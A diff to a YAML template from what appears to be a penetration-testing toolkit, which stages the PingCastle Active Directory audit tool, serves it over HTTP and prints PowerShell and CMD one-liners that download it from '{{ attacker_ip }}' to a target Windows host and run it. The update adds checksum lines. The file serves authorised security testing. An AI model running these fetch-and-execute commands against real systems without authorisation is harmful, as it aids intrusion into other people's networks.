--- a/src/profi/templates/scripts/deliver-windows-pingcastle.yaml
+++ b/src/profi/templates/scripts/deliver-windows-pingcastle.yaml
@@ -4,14 +4,24 @@ metadata:
   tags: ["windows", "privesc", "domain"]
   created: "2025-04-02"
   author: "@anakles"
+  updated: "2026-02-16"
 
 content: |
-  mkdir -p packstation/outbound; cp -n {{ tools_dir }}/pingcastle/PingCastle.exe packstation/outbound; \
-  echo '================================================================'; \
-  echo '                      -----PowerShell-----                      '; \
-  echo 'Deliver: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/PingCastle.exe -Outfile {{ delivery_path_windows }}\PingCastle.exe'; \
-  echo '================================================================'; \
-  echo '                         -----CMD-----                          '; \
-  echo 'Deliver: powershell wget -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/PingCastle.exe -Outfile {{ delivery_path_windows }}\PingCastle.exe'; \
-  echo '================================================================'; \
+  mkdir -p packstation/outbound; cp -n {{ tools_dir }}/pingcastle/PingCastle.exe packstation/outbound;
+  echo '================================================================';
+  echo '                  -----Checksum Reference-----                  ';
+  sha256sum packstation/outbound/PingCastle.exe | tee packstation/outbound/PingCastle.exe.sha256;
+  echo '================================================================';
+  echo '                      -----PowerShell-----                      ';
+  echo 'Deliver: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/PingCastle.exe -Outfile {{ delivery_path_windows }}\PingCastle.exe';
+  echo 'Verify : Get-FileHash {{ delivery_path_windows }}\PingCastle.exe -Algorithm SHA256';
+  echo 'Expect : (compare with attacker hash above)';
+  echo 'Execute: cd {{ delivery_path_windows }}; .\PingCastle.exe --healthcheck';
+  echo '================================================================';
+  echo '                         -----CMD-----                          ';
+  echo 'Deliver: powershell -c "iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/PingCastle.exe -Outfile {{ delivery_path_windows }}\PingCastle.exe"';
+  echo 'Verify : certutil -hashfile {{ delivery_path_windows }}\PingCastle.exe SHA256';
+  echo 'Expect : (compare with attacker hash above)';
+  echo 'Execute: cd /d {{ delivery_path_windows }} && PingCastle.exe --healthcheck';
+  echo '================================================================';
   python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port }} -d packstation/outbound
